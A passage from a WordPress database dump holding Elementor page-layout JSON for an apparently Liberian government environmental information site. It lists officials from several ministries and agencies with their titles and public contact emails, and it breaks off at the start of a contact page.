href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24618,3639,'_elementor_edit_mode','builder'),(24619,3639,'_elementor_template_type','wp-page'),(24620,3639,'_elementor_version','3.0.16'),(24621,3639,'_wp_page_template','default'),(24622,3639,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form 